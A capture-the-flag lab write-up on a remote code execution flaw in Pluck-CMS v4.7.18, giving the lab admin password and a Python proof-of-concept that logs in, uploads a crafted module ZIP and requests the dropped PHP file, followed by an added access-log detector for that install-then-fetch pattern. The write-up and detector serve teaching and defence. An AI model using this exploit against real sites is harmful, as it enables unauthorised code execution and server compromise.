Lab introduction
In Pluck-CMS v4.7.18, the /inc/modules_install.php component lets an attacker execute arbitrary code by uploading a crafted ZIP file.
The admin password for this lab is admin123; if you want to try it yourself, you can keep experimenting with it.
Start the lab
PoC script
# pip install requests requests_toolbelt
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder

url = "http://eci-2ze5onkv4tv72l3rr3e9.cloudeci1.ichunqiu.com/"
file_path = "miri.zip"  # module archive prepared beforehand
login_url = url + "login.php"
upload_url = url + "admin.php?action=installmodule"

# Pluck's login form only asks for the password (cont1)
headers = {"Referer": login_url}
login_payload = {"cont1": "admin123", "bogus": "", "submit": "Log in"}

# The module installer expects a multipart form with the archive in the "sendfile" field
multipart_data = MultipartEncoder(
    fields={
        "sendfile": ("mirabbas.zip", open(file_path, "rb"), "application/zip"),
        "submit": "Upload",
    }
)

session = requests.Session()
login_response = session.post(login_url, headers=headers, data=login_payload)
if login_response.status_code == 200:
    print("Login account")
    upload_headers = {
        "Referer": upload_url,
        "Content-Type": multipart_data.content_type,
    }
    upload_response = session.post(upload_url, headers=upload_headers, data=multipart_data)
    if upload_response.status_code == 200:
        print("ZIP file uploaded.")
    else:
        print("ZIP file upload error. Response code:", upload_response.status_code)
else:
    print("Login problem. Response code:", login_response.status_code)

# The installer extracts the archive under data/modules/<archive name>/
rce_url = url + "data/modules/mirabbas/miri.php"
rce = requests.get(rce_url)
print(rce.text)
Got the flag
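From the defender's side, the two requests the script above makes leave a recognisable trace in the web server's access log: an accepted POST to admin.php?action=installmodule followed shortly by a direct GET for a PHP file under data/modules/. The following detector is an added example written for this write-up, not code from Pluck or from the original post. It assumes combined-format access logs and that Pluck includes module code server-side, so a browser never needs to fetch a data/modules/*.php file directly; the log lines are constructed samples, with the third one mirroring the write-up's final GET.

```python
import re
from dataclasses import dataclass
from datetime import datetime

# Apache/nginx "combined" access-log format (the constructed sample lines below follow it).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# The two request shapes from the write-up: the module installer endpoint and a
# direct request for a PHP file dropped under data/modules/.
INSTALL_PATH = "/admin.php?action=installmodule"
MODULE_FILE_RE = re.compile(r"^/data/modules/[^/]+/[^/]+\.php$", re.IGNORECASE)


@dataclass
class Request:
    ip: str
    ts: datetime
    method: str
    path: str
    status: int


def parse_line(line: str):
    """Parse one combined-format access-log line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return Request(
        ip=m["ip"],
        ts=datetime.strptime(m["ts"], TS_FMT),
        method=m["method"],
        path=m["path"],
        status=int(m["status"]),
    )


def find_suspicious(lines, window_seconds: int = 300):
    """Flag direct requests for PHP files under data/modules/, escalating the reason when a
    module install was accepted within window_seconds before the request.
    Assumption: Pluck includes module code server-side, so such a direct fetch is anomalous."""
    installs = []
    alerts = []
    for rec in filter(None, map(parse_line, lines)):
        if rec.method == "POST" and rec.path == INSTALL_PATH and rec.status in (200, 302):
            installs.append(rec)
            continue
        if MODULE_FILE_RE.match(rec.path) and rec.status == 200:
            recent = [i for i in installs
                      if 0 <= (rec.ts - i.ts).total_seconds() <= window_seconds]
            alerts.append({
                "ip": rec.ip,
                "path": rec.path,
                "reason": ("module file requested shortly after module install"
                           if recent else "direct request to module file"),
                "installer_ips": sorted({i.ip for i in recent}),
            })
    return alerts


# Constructed sample log (not captured from the lab); line 3 mirrors the write-up's final GET.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Jan/2024:12:00:01 +0000] "POST /login.php HTTP/1.1" 200 1532
198.51.100.7 - - [10/Jan/2024:12:00:03 +0000] "POST /admin.php?action=installmodule HTTP/1.1" 200 2210
198.51.100.7 - - [10/Jan/2024:12:00:05 +0000] "GET /data/modules/mirabbas/miri.php HTTP/1.1" 200 45
203.0.113.9 - - [10/Jan/2024:12:01:00 +0000] "GET /index.php HTTP/1.1" 200 8000
203.0.113.9 - - [10/Jan/2024:13:30:00 +0000] "GET /data/modules/legacy/helper.php HTTP/1.1" 200 12
"""

if __name__ == "__main__":
    for alert in find_suspicious(SAMPLE_LOG.splitlines()):
        print(alert)
```

The install-then-fetch pairing is the high-confidence signal; a lone direct request to a module file is still worth a look, since the installer itself is reachable only with the admin password and a compromised admin session is exactly what this write-up exercises. Pairing this with a file-integrity watch on data/modules/ closes the gap where the attacker never fetches the dropped file over HTTP.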